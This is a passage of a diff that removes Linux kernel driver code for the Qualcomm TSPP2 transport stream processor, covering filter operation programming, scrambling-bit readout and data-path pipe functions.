-- case TSPP2_OP_CIPHER_SET_SCRAMBLING_3:
-- reg |= (0x3 << 16);
-- break;
-- default:
-- pr_err("%s: Invalid scrambling mode\n", __func__);
-- return -EINVAL;
-- }
--
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_OPCODE(filter->hw_index, op_index));
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--
--/**
-- * tspp2_index_op_write() - Write an Indexing operation.
-- *
-- * @filter: The filter to set the operation to.
-- * @op: The operation.
-- * @op_index: The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_index_op_write(struct tspp2_filter *filter,
-- const struct tspp2_operation *op,
-- u8 op_index)
--{
-- u32 reg = 0;
-- u32 filter_reg = 0;
-- struct tspp2_pipe *pipe = (struct tspp2_pipe *)
-- op->params.indexing.output_pipe_handle;
--
-- if (!pipe || !pipe->opened) {
-- pr_err("%s: Invalid pipe handle\n", __func__);
-- return -EINVAL;
-- }
--
-- /* Enforce Indexing related HW restrictions */
-- if (filter->indexing_op_set) {
-- pr_err(
-- "%s: Only one indexing operation supported per filter\n",
-- __func__);
-- return -EINVAL;
-- }
-- if (!filter->raw_op_with_indexing) {
-- pr_err(
-- "%s: Raw Transmit operation with indexing support must be configured before the Indexing operation\n",
-- __func__);
-- return -EINVAL;
-- }
--
-- if (!filter->pes_analysis_op_set) {
-- pr_err(
-- "%s: PES Analysis operation must precede Indexing operation\n",
-- __func__);
-- return -EINVAL;
-- }
--
-- /*
-- * Bits [19:15] = 0, Bit[14] = Index by RAI,
-- * Bits[13:12] = 0,
-- * Bits[11:6] = Output pipe, Bit[5] = Source,
-- * Bit[4] = Skip, Bits[3:0] = Opcode
-- */
--
-- reg |= TSPP2_OPCODE_INDEXING;
-- if (op->params.indexing.skip_ts_errs)
-- reg |= (0x1 << 4);
--
-- if
(op->params.indexing.input == TSPP2_OP_BUFFER_B)
-- reg |= (0x1 << 5);
--
-- reg |= ((pipe->hw_index & 0x3F) << 6);
--
-- if (op->params.indexing.random_access_indicator_indexing)
-- reg |= (0x1 << 14);
--
-- /* Indexing table ID is set in the filter and not in the operation */
-- filter->indexing_table_id = op->params.indexing.indexing_table_id;
-- filter_reg = readl_relaxed(filter->device->base +
-- TSPP2_FILTER_ENTRY0(filter->hw_index));
-- filter_reg &= ~(0x3 << FILTER_ENTRY0_CODEC_OFFS);
-- filter_reg |= (filter->indexing_table_id << FILTER_ENTRY0_CODEC_OFFS);
-- writel_relaxed(filter_reg, filter->device->base +
-- TSPP2_FILTER_ENTRY0(filter->hw_index));
--
-- filter->indexing_op_set = 1;
--
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_OPCODE(filter->hw_index, op_index));
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--
--/**
-- * tspp2_copy_op_write() - Write an Copy operation.
-- *
-- * @filter: The filter to set the operation to.
-- * @op: The operation.
-- * @op_index: The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_copy_op_write(struct tspp2_filter *filter,
-- const struct tspp2_operation *op,
-- u8 op_index)
--{
-- u32 reg = 0;
--
-- /* Bits[19:6] = 0, Bit[5] = Source, Bit[4] = 0, Bits[3:0] = Opcode */
-- reg |= TSPP2_OPCODE_COPY_PACKET;
-- if (op->params.copy_packet.input == TSPP2_OP_BUFFER_B)
-- reg |= (0x1 << 5);
--
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_OPCODE(filter->hw_index, op_index));
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--
--/**
-- * tspp2_op_write() - Write an operation of any type.
-- *
-- * @filter: The filter to set the operation to.
-- * @op: The operation.
-- * @op_index: The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_op_write(struct tspp2_filter *filter,
-- const struct tspp2_operation *op,
-- u8 op_index)
--{
-- switch (op->type) {
-- case TSPP2_OP_PES_ANALYSIS:
-- return tspp2_pes_analysis_op_write(filter, op, op_index);
-- case TSPP2_OP_RAW_TRANSMIT:
-- return tspp2_raw_tx_op_write(filter, op, op_index);
-- case TSPP2_OP_PES_TRANSMIT:
-- return tspp2_pes_tx_op_write(filter, op, op_index);
-- case TSPP2_OP_PCR_EXTRACTION:
-- return tspp2_pcr_op_write(filter, op, op_index);
-- case TSPP2_OP_CIPHER:
-- return tspp2_cipher_op_write(filter, op, op_index);
-- case TSPP2_OP_INDEXING:
-- return tspp2_index_op_write(filter, op, op_index);
-- case TSPP2_OP_COPY_PACKET:
-- return tspp2_copy_op_write(filter, op, op_index);
-- default:
-- pr_warn("%s: Unknown operation type\n", __func__);
-- return -EINVAL;
-- }
--}
--
--/**
-- * tspp2_filter_ops_add() - Set the operations of a disabled filter.
-- *
-- * @filter: The filter to work on.
-- * @op: The new operations array.
-- * @op_index: The number of operations in the array.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_filter_ops_add(struct tspp2_filter *filter,
-- const struct tspp2_operation *ops,
-- u8 operations_num)
--{
-- int i;
-- int ret = 0;
--
-- /* User parameter validity checks were already performed */
--
-- /*
-- * We want to start with a clean slate here. The user may call us to
-- * set operations several times, so need to make sure only the last call
-- * counts.
-- */
-- tspp2_filter_ops_clear(filter);
--
-- /* Save user operations in filter's database */
-- for (i = 0; i < operations_num; i++)
-- filter->operations[i] = ops[i];
--
-- /* Write user operations to HW */
-- for (i = 0; i < operations_num; i++) {
-- ret = tspp2_op_write(filter, &ops[i], i);
-- if (ret)
-- goto ops_cleanup;
-- }
--
-- /*
-- * Here we want to add the Exit operation implicitly if required, that
-- * is, if the user provided less than TSPP2_MAX_OPS_PER_FILTER
-- * operations.
However, we already called tspp2_filter_ops_clear()
-- * which set all the operations in HW to Exit, before writing the
-- * actual user operations. So, no need to do it again here.
-- * Also, if someone calls this function with operations_num == 0,
-- * it is similar to calling tspp2_filter_operations_clear().
-- */
--
-- filter->num_user_operations = operations_num;
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--
--ops_cleanup:
-- pr_err("%s: Failed to set operations to filter, clearing all\n",
-- __func__);
--
-- tspp2_filter_ops_clear(filter);
--
-- return ret;
--}
--
--/**
-- * tspp2_filter_ops_update() - Update the operations of an enabled filter.
-- *
-- * This function updates the operations of an enabled filter. In fact, it is
-- * not possible to update an existing filter without disabling it, clearing
-- * the existing operations and setting new ones. However, if we do that,
-- * we'll miss TS packets and not handle the stream properly, so a smooth
-- * transition is required.
-- * The algorithm is as follows:
-- * 1. Find a free temporary filter object.
-- * 2. Set the new filter's HW index to the reserved HW index.
-- * 3. Set the operations to the new filter. This sets the operations to
-- * the correct HW registers, based on the new HW index, and also updates
-- * the relevant information in the temporary filter object. Later we copy this
-- * to the actual filter object.
-- * 4. Use the same context as the old filter (to maintain HW state).
-- * 5. Reset parts of the context if needed.
-- * 6. Enable the new HW filter, then disable the old filter.
-- * 7. Update the source's reserved filter HW index.
-- * 8. Update the filter's batch, HW index and operations-related information.
-- *
-- * @filter: The filter to work on.
-- * @op: The new operations array.
-- * @op_index: The number of operations in the array.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_filter_ops_update(struct tspp2_filter *filter,
-- const struct tspp2_operation *ops,
-- u8 operations_num)
--{
-- int i;
-- int ret = 0;
-- int found = 0;
-- u32 reg = 0;
-- u16 hw_idx;
-- struct tspp2_filter_batch *batch;
-- struct tspp2_filter *tmp_filter = NULL;
-- struct tspp2_src *src = filter->src;
--
-- /*
-- * Find an available temporary filter object in the device's
-- * filters database.
-- */
-- for (i = 0; i < TSPP2_NUM_AVAIL_FILTERS; i++)
-- if (!src->device->filters[i].opened)
-- break;
-- if (i == TSPP2_NUM_AVAIL_FILTERS) {
-- /* Should never happen */
-- pr_err("%s: No available filters\n", __func__);
-- return -ENOMEM;
-- }
-- tmp_filter = &src->device->filters[i];
--
-- /*
-- * Set new filter operations. We do this relatively early
-- * in the function to avoid cleanup operations if this fails.
-- * Since this also writes to HW, we have to set the correct HW index.
-- */
-- tmp_filter->hw_index = src->reserved_filter_hw_index;
-- /*
-- * Need to set the mask properly to indicate if the filter handles
-- * a unique PID.
-- */
-- tmp_filter->mask = filter->mask;
-- ret = tspp2_filter_ops_add(tmp_filter, ops, operations_num);
-- if (ret) {
-- tmp_filter->hw_index = 0;
-- tmp_filter->mask = 0;
-- return ret;
-- }
--
-- /*
-- * Mark new filter (in fact, the new filter HW index) as used in the
-- * appropriate batch. The batch has to be one of the batches already
-- * associated with the source.
-- */
-- list_for_each_entry(batch, &src->batches_list, link) {
-- for (i = 0; i < TSPP2_FILTERS_PER_BATCH; i++) {
-- hw_idx = (batch->batch_id *
-- TSPP2_FILTERS_PER_BATCH) + i;
-- if (hw_idx == tmp_filter->hw_index) {
-- batch->hw_filters[i] = 1;
-- found = 1;
-- break;
-- }
-- }
-- if (found)
-- break;
-- }
--
-- if (!found) {
-- pr_err("%s: Could not find matching batch\n", __func__);
-- tspp2_filter_ops_clear(tmp_filter);
-- tmp_filter->hw_index = 0;
-- return -EINVAL;
-- }
--
-- /* Set the same context of the old filter to the new HW filter */
-- writel_relaxed((filter->context << FILTER_ENTRY1_CONTEXT_OFFS),
-- filter->device->base +
-- TSPP2_FILTER_ENTRY1(tmp_filter->hw_index));
--
-- /*
-- * Reset partial context, if necessary. We want to reset a partial
-- * context before we start using it, so if there's a new operation
-- * that uses a context where before there was no operation that used it,
-- * we reset that context. We need to do this before we start using the
-- * new operation, so before we enable the new filter.
-- * Note: there is no need to reset most of the filter's context-based
-- * counters, because the filter keeps using the same context. The
-- * exception is the PES error counters that we may want to reset when
-- * resetting the entire PES context.
-- */
-- if (!filter->pes_tx_op_set && tmp_filter->pes_tx_op_set) {
-- /* PES Tx operation added */
-- writel_relaxed(
-- (0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
-- filter->device->base +
-- TSPP2_PES_CONTEXT_RESET(filter->context >> 5));
-- writel_relaxed(0, filter->device->base +
-- TSPP2_FILTER_PES_ERRORS(filter->context));
-- }
--
-- if (!filter->indexing_op_set && tmp_filter->indexing_op_set) {
-- /* Indexing operation added */
-- writel_relaxed(
-- (0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
-- filter->device->base +
-- TSPP2_INDEXING_CONTEXT_RESET(filter->context >> 5));
-- }
--
-- /*
-- * Write PID and mask to new filter HW registers and enable it.
-- * Preserve filter indexing table ID.
-- */
-- reg |= (0x1 << FILTER_ENTRY0_EN_OFFS);
-- reg |= ((filter->pid_value << FILTER_ENTRY0_PID_OFFS) |
-- (filter->mask << FILTER_ENTRY0_MASK_OFFS));
-- reg |= (tmp_filter->indexing_table_id << FILTER_ENTRY0_CODEC_OFFS);
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_FILTER_ENTRY0(tmp_filter->hw_index));
--
-- /* Disable old HW filter */
-- writel_relaxed(0, filter->device->base +
-- TSPP2_FILTER_ENTRY0(filter->hw_index));
--
-- /*
-- * HW requires we wait for up to 2ms here before removing the
-- * operations used by this filter.
-- */
-- udelay(TSPP2_HW_DELAY_USEC);
--
-- tspp2_filter_ops_clear(filter);
--
-- writel_relaxed(0, filter->device->base +
-- TSPP2_FILTER_ENTRY1(filter->hw_index));
--
-- /* Mark HW filter as unused in old batch */
-- filter->batch->hw_filters[(filter->hw_index -
-- (filter->batch->batch_id * TSPP2_FILTERS_PER_BATCH))] = 0;
--
-- /* The new HW filter may be in a new batch, so we need to update */
-- filter->batch = batch;
--
-- /*
-- * Update source's reserved filter HW index, and also update the
-- * new HW index in the filter object.
-- */
-- src->reserved_filter_hw_index = filter->hw_index;
-- filter->hw_index = tmp_filter->hw_index;
--
-- /*
-- * We've already set the new operations to HW, but we want to
-- * update the filter object, too. tmp_filter contains all the
-- * operations' related information we need (operations and flags).
-- * Also, we make sure to update indexing_table_id based on the new
-- * indexing operations.
-- */
-- memcpy(filter->operations, tmp_filter->operations,
-- (sizeof(struct tspp2_operation) * TSPP2_MAX_OPS_PER_FILTER));
-- filter->num_user_operations = tmp_filter->num_user_operations;
-- filter->indexing_op_set = tmp_filter->indexing_op_set;
-- filter->raw_op_with_indexing = tmp_filter->raw_op_with_indexing;
-- filter->pes_analysis_op_set = tmp_filter->pes_analysis_op_set;
-- filter->raw_op_set = tmp_filter->raw_op_set;
-- filter->pes_tx_op_set = tmp_filter->pes_tx_op_set;
-- filter->indexing_table_id = tmp_filter->indexing_table_id;
--
-- /*
-- * Now we can clean tmp_filter. This is really just to keep the filter
-- * object clean. However, we don't want to use tspp2_filter_ops_clear()
-- * because it clears the operations from HW too.
-- */
-- memset(tmp_filter->operations, 0,
-- (sizeof(struct tspp2_operation) * TSPP2_MAX_OPS_PER_FILTER));
-- tmp_filter->num_user_operations = 0;
-- tmp_filter->indexing_op_set = 0;
-- tmp_filter->raw_op_with_indexing = 0;
-- tmp_filter->pes_analysis_op_set = 0;
-- tmp_filter->raw_op_set = 0;
-- tmp_filter->pes_tx_op_set = 0;
-- tmp_filter->indexing_table_id = 0;
-- tmp_filter->hw_index = 0;
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--
--/**
-- * tspp2_filter_operations_set() - Set operations to a filter.
-- *
-- * @filter_handle: Filter to set operations to.
-- * @ops: An array of up to TSPP2_MAX_OPS_PER_FILTER
-- * operations.
-- * @operations_num: Number of operations in the ops array.
-- *
-- * This function sets the required operations to a given filter. The filter
-- * can either be disabled (in which case it may or may not already have some
-- * operations set), or enabled (in which case it certainly has some oprations
-- * set). In any case, the filter's previous operations are cleared, and the new
-- * operations provided are set.
-- *
-- * In addition to some trivial parameter validity checks, the following
-- * restrictions are enforced:
-- * 1.
A filter with a PES Analysis operation must handle a unique PID (i.e.,
-- * should have a mask that equals TSPP2_UNIQUE_PID_MASK).
-- * 2. Only a single Raw Transmit operation per filter can support HW indexing
-- * (i.e., can have its support_indexing configuration parameter set).
-- * 3. A PES Analysys operation must precede any PES Transmit operation.
-- * 4. A PES Transmit operation with SW indexing (i.e., with its
-- * enable_sw_indexing parameter set) must be preceded by a Raw Transmit
-- * operation.
-- * 5. Only a single indexing operation is supported per filter.
-- * 6. A Raw Transmit operation with indexing support must be configured before
-- * the Indexing operation.
-- * 7. A PES Analysis operation must precede the Indexing operation.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_operations_set(u32 filter_handle,
-- const struct tspp2_operation *ops,
-- u8 operations_num)
--{
-- struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
-- int ret = 0;
--
-- if (!filter) {
-- pr_err("%s: Invalid filter handle\n", __func__);
-- return -EINVAL;
-- }
-- if (!ops || operations_num > TSPP2_MAX_OPS_PER_FILTER ||
-- operations_num == 0) {
-- pr_err("%s: Invalid ops parameter\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(filter->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&filter->device->mutex)) {
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!filter->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EPERM;
-- }
--
-- if (!filter->opened) {
-- pr_err("%s: Filter not opened\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
--
pm_runtime_put_autosuspend(filter->device->dev);
-- return -EINVAL;
-- }
--
-- if (filter->enabled)
-- ret = tspp2_filter_ops_update(filter, ops, operations_num);
-- else
-- ret = tspp2_filter_ops_add(filter, ops, operations_num);
--
-- mutex_unlock(&filter->device->mutex);
--
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
--
-- return ret;
--}
--EXPORT_SYMBOL(tspp2_filter_operations_set);
--
--/**
-- * tspp2_filter_operations_clear() - Clear all operations from a filter.
-- *
-- * @filter_handle: Filter to clear all operations from.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_operations_clear(u32 filter_handle)
--{
-- int ret;
-- struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--
-- if (!filter) {
-- pr_err("%s: Invalid filter handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(filter->device->dev);
-- if (ret < 0)
-- return ret;
--
-- mutex_lock(&filter->device->mutex);
--
-- if (!filter->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EPERM;
-- }
--
-- if (!filter->opened) {
-- pr_err("%s: Filter not opened\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EINVAL;
-- }
--
-- if (filter->num_user_operations == 0) {
-- pr_warn("%s: No operations to clear from filter\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return 0;
-- }
--
-- tspp2_filter_ops_clear(filter);
--
-- mutex_unlock(&filter->device->mutex);
--
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
--
--
dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_operations_clear);
--
--/**
-- * tspp2_filter_current_scrambling_bits_get() - Get the current scrambling bits.
-- *
-- * @filter_handle: Filter to get the scrambling bits from.
-- * @scrambling_bits_value: The current value of the scrambling bits.
-- * This could be the value from the TS packet
-- * header, the value from the PES header, or a
-- * logical OR operation of both values, depending
-- * on the scrambling_bits_monitoring configuration
-- * of the source this filter belongs to.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_current_scrambling_bits_get(u32 filter_handle,
-- u8 *scrambling_bits_value)
--{
-- struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
-- u32 reg;
-- u32 ts_bits;
-- u32 pes_bits;
-- int ret;
--
-- if (!filter) {
-- pr_err("%s: Invalid filter handle\n", __func__);
-- return -EINVAL;
-- }
-- if (scrambling_bits_value == NULL) {
-- pr_err("%s: Invalid parameter\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(filter->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&filter->device->mutex)) {
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!filter->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EPERM;
-- }
--
-- if (!filter->opened) {
-- pr_err("%s: Filter not opened\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EINVAL;
-- }
--
-- reg = readl_relaxed(filter->device->base +
-- TSPP2_TSP_CONTEXT(filter->context));
--
-- ts_bits = ((reg >>
TSP_CONTEXT_TS_HEADER_SC_OFFS) & 0x3);
-- pes_bits = ((reg >> TSP_CONTEXT_PES_HEADER_SC_OFFS) & 0x3);
--
-- switch (filter->src->scrambling_bits_monitoring) {
-- case TSPP2_SRC_SCRAMBLING_MONITOR_PES_ONLY:
-- *scrambling_bits_value = pes_bits;
-- break;
-- case TSPP2_SRC_SCRAMBLING_MONITOR_TS_ONLY:
-- *scrambling_bits_value = ts_bits;
-- break;
-- case TSPP2_SRC_SCRAMBLING_MONITOR_PES_AND_TS:
-- *scrambling_bits_value = (pes_bits | ts_bits);
-- break;
-- case TSPP2_SRC_SCRAMBLING_MONITOR_NONE:
-- /* fall through to default case */
-- default:
-- pr_err("%s: Invalid scrambling bits mode\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EINVAL;
-- }
--
-- mutex_unlock(&filter->device->mutex);
--
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_current_scrambling_bits_get);
--
--/* Data-path API functions */
--
--/**
-- * tspp2_pipe_descriptor_get() - Get a data descriptor from a pipe.
-- *
-- * @pipe_handle: Pipe to get the descriptor from.
-- * @desc: Received pipe data descriptor.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_pipe_descriptor_get(u32 pipe_handle, struct sps_iovec *desc)
--{
-- int ret;
-- struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
--
-- if (!pipe) {
-- pr_err("%s: Invalid pipe handle\n", __func__);
-- return -EINVAL;
-- }
-- if (!desc) {
-- pr_err("%s: Invalid descriptor pointer\n", __func__);
-- return -EINVAL;
-- }
--
-- /* Descriptor pointer validity is checked inside the SPS driver.
*/
--
-- ret = pm_runtime_get_sync(pipe->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&pipe->device->mutex)) {
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!pipe->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&pipe->device->mutex);
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -EPERM;
-- }
--
-- if (!pipe->opened) {
-- pr_err("%s: Pipe not opened\n", __func__);
-- mutex_unlock(&pipe->device->mutex);
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -EINVAL;
-- }
--
-- ret = sps_get_iovec(pipe->sps_pipe, desc);
--
-- mutex_unlock(&pipe->device->mutex);
--
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
--
-- dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
-- return ret;
--
--}
--EXPORT_SYMBOL(tspp2_pipe_descriptor_get);
--
--/**
-- * tspp2_pipe_descriptor_put() - Release a descriptor for reuse by the pipe.
-- *
-- * @pipe_handle: Pipe to release the descriptor to.
-- * @addr: Address to release for reuse.
-- * @size: Size to release.
-- * @flags: Descriptor flags.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_pipe_descriptor_put(u32 pipe_handle, u32 addr, u32 size, u32 flags)
--{
-- int ret;
-- struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
--
-- if (!pipe) {
-- pr_err("%s: Invalid pipe handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(pipe->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&pipe->device->mutex)) {
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!pipe->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&pipe->device->mutex);
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -EPERM;
-- }
--
-- if (!pipe->opened) {
-- pr_err("%s: Pipe not opened\n", __func__);
-- mutex_unlock(&pipe->device->mutex);
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -EINVAL;
-- }
--
-- ret = sps_transfer_one(pipe->sps_pipe, addr, size, NULL, flags);
--
-- mutex_unlock(&pipe->device->mutex);
--
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
--
-- dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
-- return ret;
--}
--EXPORT_SYMBOL(tspp2_pipe_descriptor_put);
--
--/**
-- * tspp2_pipe_last_address_used_get() - Get the last address the TSPP2 used.
-- *
-- * @pipe_handle: Pipe to get the address from.
-- * @address: The last (virtual) address TSPP2 wrote data to.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_pipe_last_address_used_get(u32 pipe_handle, u32 *address)
--{
-- int ret;
-- struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
--
-- if (!pipe) {
-- pr_err("%s: Invalid pipe handle\n", __func__);
-- return -EINVAL;
-- }
-- if (!address) {
-- pr_err("%s: Invalid address pointer\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(pipe->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&pipe->device->mutex)) {
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!pipe->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&pipe->device->mutex);
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -EPERM;
-- }
--
-- if (!pipe->opened) {
-- pr_err("%s: Pipe not opened\n", __func__);
-- mutex_unlock(&pipe->device->mutex);
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -EINVAL;
-- }
--
-- *address = readl_relaxed(pipe->device->base +
-- TSPP2_PIPE_LAST_ADDRESS(pipe->hw_index));
--
-- mutex_unlock(&pipe->device->mutex);
--
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
--
-- *address = be32_to_cpu(*address);
--
-- dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_pipe_last_address_used_get);
--
--/**
-- * tspp2_data_write() - Write (feed) data to a source.
-- *
-- * @src_handle: Source to feed data to.
-- * @offset: Offset in the source's input pipe buffer.
-- * @size: Size of data to write, in bytes.
-- *
-- * Schedule BAM transfers to feed data from the source's input pipe
-- * to TSPP2 for processing.
Note that the user is responsible for opening
-- * an input pipe with the appropriate configuration parameters, and attaching
-- * this pipe as an input pipe to the source. Pipe configuration validity is not
-- * verified by this function.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_data_write(u32 src_handle, u32 offset, u32 size)
--{
-- int ret;
-- u32 desc_length;
-- u32 desc_flags;
-- u32 data_length = size;
-- u32 data_offset = offset;
-- struct tspp2_pipe *pipe;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- goto err_inval;
-- }
--
-- if (!src->enabled) {
-- pr_err("%s: Source not enabled\n", __func__);
-- goto err_inval;
-- }
--
-- if ((src->input != TSPP2_INPUT_MEMORY) || !src->input_pipe) {
-- pr_err("%s: Invalid source input or no input pipe\n", __func__);
-- goto err_inval;
-- }
--
-- pipe = src->input_pipe;
--
-- if (offset + size > pipe->cfg.buffer_size) {
-- pr_err("%s: offset + size > buffer size\n", __func__);
-- goto err_inval;
-- }
--
-- while (data_length) {
-- if (data_length > pipe->cfg.sps_cfg.descriptor_size) {
-- desc_length = pipe->cfg.sps_cfg.descriptor_size;
-- desc_flags = 0;
-- } else {
-- /* last descriptor */
-- desc_length = data_length;
-- desc_flags = SPS_IOVEC_FLAG_EOT;
-- }
--
-- ret =
sps_transfer_one(pipe->sps_pipe,
-- pipe->iova + data_offset,
-- desc_length,
-- pipe->cfg.sps_cfg.user_info,
-- desc_flags);
--
-- if (ret) {
-- pr_err("%s: sps_transfer_one failed, %d\n",
-- __func__, ret);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return ret;
-- }
--
-- data_offset += desc_length;
-- data_length -= desc_length;
-- }
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--
--err_inval:
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- return -EINVAL;
--}
--EXPORT_SYMBOL(tspp2_data_write);
--
--/**
-- * tspp2_tsif_data_write() - Write (feed) data to a TSIF source via Loopback.
